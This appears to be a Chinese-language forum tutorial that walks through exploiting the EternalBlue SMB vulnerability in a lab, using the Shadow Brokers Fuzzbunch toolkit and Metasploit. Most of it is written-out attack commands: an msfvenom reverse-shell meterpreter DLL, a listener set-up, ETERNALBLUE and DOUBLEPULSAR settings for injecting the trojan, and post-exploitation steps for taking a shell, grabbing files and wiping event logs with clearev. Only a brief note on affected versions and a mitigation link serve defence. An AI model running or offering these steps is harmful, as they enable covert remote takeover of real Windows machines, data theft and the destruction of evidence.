1.漏洞描述
2.漏洞影响
1.环境搭建
2.windows7(32)攻击机工具安装及配置
Shadow Brokers工具包:https://github.com/misterch0c/shadowbroker
Python2.6
工具直接安装即可;Pywin32
的安装需要以管理员权限执行;Shadowbrokers-master
直接解压到指定目录,同时修改FuzzyBunch.xml文件内容,设置相应的ResourceDir和LogDir参数值,修改结果如下图所示:
3.Kali下生成木马程序
/> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=5555 -f dll > systemSet.dll
4.使用Kali开启msfpayload监听
1.开启msfconsole
/> cd /usr/share/metasploit-framework
/> msfconsole
2.设置开启监听
/> use exploit/multi/handler
/> set payload windows/x64/meterpreter/reverse_tcp
/> set LHOST 192.168.43.89
/> set LPORT 5555
/> exploit
5.Fuzzbunch基本配置
1.生成后,将dll文件拷贝到攻击机C盘的根目录下,运行windows中的fb.py
,并将其中的第72行注释掉;利用 EternalBlue 攻击受害系统,成功后使用 Doublepulsa 将刚刚生成的木马,远程注入受害系统中,从控制机上控制受害机;在使用 Fuzzbunch 时需要做些配置,如以下示图:(除特殊说明外,其它配置保持默认即可)
2.需要设置的有攻击IP地址:192.168.43.28(受害机), 回调地址192.168.43.198(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他默认即可
3.输入命令开启永恒之蓝开始攻击use ETERNALBLUE
依次填入相关参数,超时时间等默认参数可直接回车,需要注意的就是选择被攻击方的操作系统目标系统信息。以及攻击模式选择FB
4.运行插件,看到 Eternalblue Succeeded 攻击成功
5.使用 Doublepulsar,把刚刚生成的木马注入到受害系统中use Doublepulasr
;一路回车,需要注意的是选择目标操作系统架构,系统后门的执行方式选择 Rundll
填写刚刚生成木马文件的路径
Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束
6.返回到控制机,已链接
1.sysinfo
查看靶机的基本信息
2.screenshot
截取被控制端电脑的屏幕看看
3.shell
获取被控制系统的shell,就是像在你电脑上运行cmd一样,任何命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩……能做到很多,上传,下载文件,执行文件
4.clearev
清理掉痕迹,清理被控制端的日志
“永恒之蓝”会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
紧急临时解决办法:https://www.cnblogs.com/qiyeboy/p/6848935.html
/> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=5555 -f dll > systemSet.dll
- 说明:-p 指定攻击载荷,LHOST指定监听地址,LPORT指定监听端口,-f 指定木马程序格式为dll,> 指定生成木马程序的保存路径,systemSet.dll表示木马程序保存在当前目录下,我们可以通过ls查看
/> cd /usr/share/metasploit-framework
/> msfconsole
/> use exploit/multi/handler
/> set payload windows/x64/meterpreter/reverse_tcp
/> set LHOST 192.168.43.89
/> set LPORT 5555
/> exploit
-
Eternalblue
通过 TCP 端口445
和139
来利用SMBv1
和NBT
中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
- 目前已知受影响的windows版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!